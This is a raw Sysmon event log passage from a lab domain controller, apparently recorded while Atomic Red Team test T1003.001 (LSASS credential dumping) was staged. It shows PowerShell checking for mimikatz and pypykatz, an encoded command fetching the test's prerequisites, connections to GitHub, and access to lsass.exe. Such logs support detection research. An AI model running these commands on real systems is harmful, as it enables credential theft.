0319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004461Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.515{D28789B6-7CD5-5FA1-DF00-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004460Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.379{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C65-5FA1-1E00-000000008801}2268C:\Windows\system32\compattelrunner.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004459Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.379{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C65-5FA1-1E00-000000008801}2268C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000004458Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.893{D28789B6-7CD2-5FA1-DB00-000000008801}2764raw.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.12.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x80000000000000004457Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.629{D28789B6-7CD2-5FA1-DB00-000000008801}2764github.com0::ffff:140.82.121.3;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000004456Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.882{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50344-false151.101.12.133-443https 354300x80000000000000004455Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.631{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50343-false140.82.121.3lb-140-82-121-3-fra.github.com443https 11241100x80000000000000004612Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.975{D28789B6-7CD6-5FA1-E700-000000008801}2892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_v20has0g.i3r.ps12020-11-03 15:52:54.975 10341000x80000000000000004611Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.959{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD6-5FA1-E700-000000008801}2892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004610Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD6-5FA1-E700-000000008801}2892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004609Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD6-5FA1-E700-000000008801}2892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004608Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004607Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004606Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004605Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004604Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004603Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004602Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004601Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004600Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004599Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CD6-5FA1-E700-000000008801}2892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004598Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.928{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD6-5FA1-E700-000000008801}2892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004597Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.935{D28789B6-7CD6-5FA1-E700-000000008801}2892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (cmd /c pypykatz -h) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand 